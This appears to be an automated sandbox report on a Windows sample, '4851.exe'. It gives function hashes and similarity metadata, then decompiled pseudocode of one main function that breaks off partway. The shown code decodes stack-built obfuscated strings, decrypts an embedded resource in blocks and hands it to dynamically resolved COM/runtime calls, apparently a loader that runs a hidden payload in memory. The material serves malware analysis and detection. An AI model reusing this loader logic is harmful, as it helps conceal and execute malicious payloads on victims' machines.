__aulldiv.LIBCMT ref: 004093B3

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 3b37e0402f5e88a24cd54120ed0c8971b64c3c77b604363197ce8ccf3d50387e
Instruction ID: 9775ac8865775e0078212ff34c9d7a7a435287777d9b69ef593b4f53334ff859
Opcode Fuzzy Hash: 3b37e0402f5e88a24cd54120ed0c8971b64c3c77b604363197ce8ccf3d50387e
Instruction Fuzzy Hash: CF4106B1E101299FDB24CF48C881BAEB7B5BF85314F1444AA9549BB282C3785E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC7D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

9, xrefs: 0040BEA9

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: cf63fa43b2fec6a462cbc6b52d09e5480398d9048cf3ff36c2423729eb9e9a6a
Instruction ID: 2ae36520fe608f0e9bd27ae0c340c33d2df10bf196d53f0f246edd76fc421c82
Opcode Fuzzy Hash: cf63fa43b2fec6a462cbc6b52d09e5480398d9048cf3ff36c2423729eb9e9a6a
Instruction Fuzzy Hash: 1F41F4719106299FDB64DF48C889BEEB7B5FF84300F1085AAD049B7281C7389E80CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00409195, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 2cb42106214b933ff1057958f70d752e3326e961ca26f08f9843ce3b4d58efb5
Instruction ID: 71393cb405c719efe5244417ae959a61503950a56829886fd48ecbd10c15cf16
Opcode Fuzzy Hash: 2cb42106214b933ff1057958f70d752e3326e961ca26f08f9843ce3b4d58efb5
Instruction Fuzzy Hash: 694107B1A101299FDB24CF48C981BAEB7B5FF89314F0445EAD549B7282C7385E81CF09

Uniqueness

Uniqueness Score: -1.00%

Function 00416EFC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

9, xrefs: 00417128

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 8ce41912a1b347a263a91636f5d5f96e675f446a69cf18611fc11741e30a83ae
Instruction ID: 405050d5174ba0ee3e0eba664eb3cdc2441412e0c1c63fc81406b22780931f2e
Opcode Fuzzy Hash: 8ce41912a1b347a263a91636f5d5f96e675f446a69cf18611fc11741e30a83ae
Instruction Fuzzy Hash: 5041C271D15229DFEB24CF58C899BEEBBB5BB49304F10819AE049A7240C7389A85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC2C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

9, xrefs: 0040BEA9

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9721e498b965dfc23a5c6fb8e7f52c96cc77b554799f9a67d6aaa4935f960fb6
Instruction ID: 0a42655c7a774d879dc841d46314a80b26bf1ddbe6c657884e88b336a11a07f8
Opcode Fuzzy Hash: 9721e498b965dfc23a5c6fb8e7f52c96cc77b554799f9a67d6aaa4935f960fb6
Instruction Fuzzy Hash: 0341D471914629DFDB64DF58C989BEEB7B5FF84300F1045AAE109A7281C7389E81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040913E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
_get_int64_arg.LIBCMTD ref: 004091E9
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: cb2bff02f70d6d2748a44f213675fbe404e2785281d23fe7b2221e6ee842fae9
Instruction ID: 2b032b969eef1cc73539dd068c6ab1a17e1f764d383506258b0b77334654677e
Opcode Fuzzy Hash: cb2bff02f70d6d2748a44f213675fbe404e2785281d23fe7b2221e6ee842fae9
Instruction Fuzzy Hash: 924106B1A00129DFDB24CF48D981B9EB7B5FF89314F1445EAA549B7282C3385E81CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00416EAB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
_get_int64_arg.LIBCMTD ref: 00416F50
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

9, xrefs: 00417128

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 888e69bf21e1732104ff1186960623cbb7378ef8ef070d964f58f46c1f86ec06
Instruction ID: 10ab773ce3fb23519fac46658c1cdc41e38e08bec72a7ee7b8a91b9d81674e43
Opcode Fuzzy Hash: 888e69bf21e1732104ff1186960623cbb7378ef8ef070d964f58f46c1f86ec06
Instruction Fuzzy Hash: 9441A271D15229DFDB24CF58C899BEEBBB5BB49304F1081DAE409A7240C7389AC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00409000, Relevance: 6.2, APIs: 4, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.330506917.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514b26060a052ab791055eac35d5f3142d0926c256ec69b39f1d47c2399f3e66
Instruction ID: 6c2de4499af3230f49cd3d528fbc42fa7d3fd1166e415e0bff70b252203ff194
Opcode Fuzzy Hash: 514b26060a052ab791055eac35d5f3142d0926c256ec69b39f1d47c2399f3e66
Instruction Fuzzy Hash: 62A15DB1D10118EBDB14DF94DC81BEEB3B5BB88304F0485AAE109B7282D7399E45CF59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 4851.exe PID: 6972 Parent PID: 3388 4851.exeCOMMON

Executed Functions

Function 004019F0, Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				void* _t403;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												_t403 = E004018D0(_t564 + 0x3c); // executed
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, _t403); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, "true", 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x749acf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
